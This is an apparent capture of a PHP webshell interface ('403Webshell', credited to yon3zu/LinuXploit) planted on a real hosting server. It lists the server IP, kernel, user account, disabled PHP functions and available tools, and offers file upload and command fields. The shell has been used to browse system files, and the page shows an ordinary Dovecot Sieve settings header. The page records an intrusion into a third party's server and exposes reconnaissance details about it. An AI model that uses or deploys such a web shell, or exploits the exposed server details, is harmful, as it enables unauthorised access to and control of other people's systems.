403Webshell
Server IP : 176.32.38.42  /  Your IP : 216.73.217.52
Web Server : LiteSpeed
System : Linux ha006.mymail.zone 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64
User : s1225329 ( 1835)
PHP Version : 7.4.33
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/2206090/root/usr/include/dovecot/sieve/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/2206090/root/usr/include/dovecot/sieve/sieve-settings.h
#ifndef SIEVE_SETTINGS_H
#define SIEVE_SETTINGS_H

#include "sieve-common.h"

/*
 * Access to settings
 */

static inline const char *
sieve_setting_get(struct sieve_instance *svinst, const char *identifier)
{
	const struct sieve_callbacks *callbacks = svinst->callbacks;

	if (callbacks == NULL || callbacks->get_setting == NULL)
		return NULL;

	return callbacks->get_setting(svinst->context, identifier);
}

bool sieve_setting_get_uint_value(struct sieve_instance *svinst,
				  const char *setting,
				  unsigned long long int *value_r);
bool sieve_setting_get_int_value(struct sieve_instance *svinst,
				 const char *setting, long long int *value_r);
bool sieve_setting_get_size_value(struct sieve_instance *svinst,
				  const char *setting, size_t *value_r);
bool sieve_setting_get_bool_value(struct sieve_instance *svinst,
				  const char *setting, bool *value_r);
bool sieve_setting_get_duration_value(struct sieve_instance *svinst,
				      const char *setting,
				      sieve_number_t *value_r);

/*
 * Main Sieve engine settings
 */

void sieve_settings_load(struct sieve_instance *svinst);

/*
 * Home directory
 */

static inline const char *
sieve_environment_get_homedir(struct sieve_instance *svinst)
{
	const struct sieve_callbacks *callbacks = svinst->callbacks;

	if (svinst->home_dir != NULL)
		return svinst->home_dir;
	if (callbacks == NULL || callbacks->get_homedir == NULL)
		return NULL;

	return callbacks->get_homedir(svinst->context);
}

#endif

Youez - 2016 - github.com/yon3zu
LinuXploit